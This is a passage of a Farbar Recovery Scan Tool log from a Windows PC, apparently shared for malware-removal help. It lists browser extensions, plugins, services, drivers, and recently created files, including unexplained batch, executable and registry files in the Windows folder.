FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2018-07-17]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-11-24] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi
FF Extension: (KeepVid Pro) - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi [2017-09-02] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @ASC/FileLabPlugin;version=1.1.33 -> C:\ProgramData\FileLab\Plugin\Framework\npFlPluginS.dll [2012-02-20] (Ascensio System SIA -> FileLab) [File not signed]
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2017-11-21] (DivX, LLC -> DivX, LLC)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nokia.com/EnablerPlugin -> C:\Program Files (x86)\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll [2014-11-19] (Nokia ->  )
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-06] (RealNetworks, Inc. -> RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Vladana\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-02-20] (Unity Technologies ApS -> Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.com/webhp?complete=0&hl=en
CHR StartupUrls: Profile 1 -> "chrome://apps/"
CHR NewTab: Profile 1 ->  Not-active:"chrome-extension://eedlgdlajadkbbjoobobefphmfkcchfk/newtab.html"
CHR DefaultSearchURL: Profile 1 -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=chrome&addonversion=2.1.0
CHR DefaultSearchKeyword: Profile 1 -> ecosia
CHR DefaultSuggestURL: Profile 1 -> hxxps://ac.ecosia.org/?q={searchTerms}&type=list&mkt=en_US
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-09-06]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-11-18]
CHR Extension: (Slides) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-06]
CHR Extension: (Docs) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-06]
CHR Extension: (Google Drive) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
CHR Extension: (Video Progress Bar & Controls for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bhdahocbinakfolafliljfkgkdeemgcd [2019-01-07]
CHR Extension: (YouTube) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-06]
CHR Extension: (Facebook) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2018-09-06]
CHR Extension: (Chrome IG Story) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-02-16]
CHR Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-10-30]
CHR Extension: (Disable automatic tab discarding) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\dnhngfnfolbmhgealdpolmhimnoliiok [2019-09-26]
CHR Extension: (Ecosia Search) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\eedlgdlajadkbbjoobobefphmfkcchfk [2019-10-10]
CHR Extension: (Adobe Acrobat) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-11-18]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2019-10-05]
CHR Extension: (Sheets) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-06]
CHR Extension: (Skyload - Music and video downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fnmpfimijcopbiaiobinamadmnmhckmp [2019-08-23]
CHR Extension: (Emojis - Emoji Keyboard) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gaoflciahikhligngeccdecgfjngejlh [2019-11-02]
CHR Extension: (Google Docs Offline) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Super Auto Refresh Plus) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\globgafddkdlnalejlkcpaefakkhkdoa [2019-10-19]
CHR Extension: (Stream Video Downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-15]
CHR Extension: (GoodTwitter) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jbanhionoclikdjnjlcmefiofgjimgca [2019-10-05]
CHR Extension: (Penzu) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\khgpedpfmjojllfmmhfabemdelhncneo [2018-09-06]
CHR Extension: (Google Hangouts) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\knipolnnllmklapflnccelgolnpehhpl [2019-05-23]
CHR Extension: (Google Maps) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2018-09-06]
CHR Extension: (Twitter Video Downloader | Fast and Free) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nbkknbagklenkcienihfapbfpjemnfoi [2019-10-28]
CHR Extension: (IG Stories for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilbfjdbacfdodpbdondbbkmoigehodg [2019-10-15]
CHR Extension: (Slinky Modern) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilnodhmmonndffbejancdeiggflcehi [2018-09-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-05]
CHR Extension: (Spotify Music Dwnloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\oefdcdmhklplgdmendjfnjeiijgcmabi [2019-01-25]
CHR Extension: (Gmail) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-30]
CHR Extension: (Chrome Media Router) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-10-24]
CHR Extension: (RightToCopy) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\plmcimdddlobkphnofejmeidjblideca [2018-12-02]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\System Profile [2018-09-06]
CHR HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
 
Opera: 
=======
OPR DownloadDir: C:\Users\Vladana\Desktop
OPR StartupUrls: "hxxps://www.google.rs/webhp?complete=0&hl=en&gws_rd=cr&ei=2SN4VYC0FIHbsgHZ8IDQCA"
OPR Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\filddmgeklidnenaibigmjeopkaccljm [2019-06-13]
OPR Extension: (Flash Video Downloader (FVD)) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2018-09-09]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-10-04] (AVAST Software s.r.o. -> AVAST Software)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc)
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [81280 2019-10-25] (Mixbyte Inc -> Freemake)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation -> Intel Corporation)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2012-04-17] (Intel Corporation-Mobile Wireless Group -> )
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [File not signed]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [51608 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] (RealNetworks, Inc. -> )
S4 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] (RealNetworks, Inc. -> )
R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2015-10-19] (Popcorn Time) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2671376 2012-04-17] (Intel Corporation-Mobile Wireless Group -> Intel® Corporation)
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AMPPAL; C:\Windows\System32\DRIVERS\AMPPAL.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
S3 AMPPALP; C:\Windows\System32\DRIVERS\amppal.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [37616 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [204824 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [274456 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [209552 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [65120 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [276952 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42736 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [171520 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110320 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [83792 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [848432 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [460448 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [236024 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [316528 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [76192 2018-03-19] (Malwarebytes Corporation -> )
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED  -> FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [7808 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\System32\DRIVERS\FUJ02E3.sys [7296 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [112864 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [44768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253664 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [93816 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 nmwcd; C:\Windows\System32\drivers\ccdcmbx64.sys [19968 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdc; C:\Windows\System32\drivers\ccdcmbox64.sys [27136 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsucx64; C:\Windows\System32\drivers\nmwcdnsucx64.sys [12800 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsux64; C:\Windows\System32\drivers\nmwcdnsux64.sys [171008 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 pccsmcfd; C:\Windows\System32\DRIVERS\pccsmcfdx64.sys [26112 2012-10-17] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-27] (Microsoft Windows Hardware Compatibility Publisher -> )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2013-02-20] () [File not signed]
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 upperdev; C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 UsbserFilt; C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
U3 ax0s195n; C:\Windows\System32\Drivers\ax0s195n.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ===================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-18 20:43 - 2019-11-18 20:43 - 000003370 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-18 20:43 - 2019-11-18 20:43 - 000003240 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-18 19:52 - 2019-11-18 19:53 - 000010340 _____ C:\Users\Vladana\Desktop\Fixlog.txt
2019-11-18 19:25 - 2019-11-18 19:53 - 000008593 _____ C:\Users\Vladana\Desktop\fixlist.txt
2019-11-18 14:53 - 2019-11-18 20:55 - 000046095 _____ C:\Users\Vladana\Desktop\FRST.txt
2019-11-18 14:24 - 2019-11-18 20:54 - 000000000 ____D C:\FRST
2019-11-18 14:22 - 2019-11-18 14:52 - 002260480 _____ (Farbar) C:\Users\Vladana\Desktop\FRST64.exe
2019-11-17 00:17 - 2019-10-21 20:51 - 000002930 _____ C:\Windows\e.bat
2019-11-17 00:17 - 2019-07-30 17:00 - 000004608 _____ () C:\Windows\e.exe
2019-11-17 00:16 - 2019-09-12 17:27 - 000025600 _____ () C:\Windows\fr.exe
2019-11-16 17:33 - 2019-11-16 17:45 - 000000000 ____D C:\Users\Vladana\AppData\Local\CrashDumps
2019-11-16 16:40 - 2019-11-18 19:26 - 000000000 ____D C:\ProgramData\Hotspot Shield
2019-11-16 16:39 - 2019-11-16 16:39 - 000000000 ____D C:\Users\Vladana\AppData\Local\Turbo.net
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\Wget
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\curl
2019-11-16 16:28 - 2019-10-12 19:40 - 000004608 _____ () C:\Windows\d.exe
2019-11-16 16:28 - 2019-09-12 15:16 - 000001241 _____ C:\Windows\d.bat
2019-11-16 16:28 - 2019-08-09 16:30 - 000000001 _____ C:\Windows\y.txt
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_n.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_f.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000290 _____ C:\Windows\e.reg
2019-11-16 16:21 - 2019-11-16 16:21 - 000000000 ____D C:\Users\Vladana\Documents\Visual Studio 2005
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\Users\Public\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\ProgramData\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 14:14 - 2019-11-16 14:14 - 000001216 _____ C:\Users\Vladana\Desktop\4K Video Downloader.lnk
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\4K Video Downloader
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Local\4kdownload.com
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Program Files (x86)\4KDownload
2019-11-15 19:03 - 2019-11-17 00:15 - 000000000 ____D C:\Users\Vladana\AppData\Local\ZenMate
2019-11-11 01:34 - 2019-11-18 01:34 - 000003348 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-11 01:34 - 2019-11-18 01:34 - 000003218 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-08 21:02 - 2019-11-11 01:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\Users\Public\Desktop\Mp3tag.lnk
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\ProgramData\Desktop\Mp3tag.lnk
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-18 20:47 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-11-18 20:47 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-11-18 20:41 - 2018-07-17 21:31 - 000000000 ____D C:\Users\Vladana\AppData\Local\AVAST Software
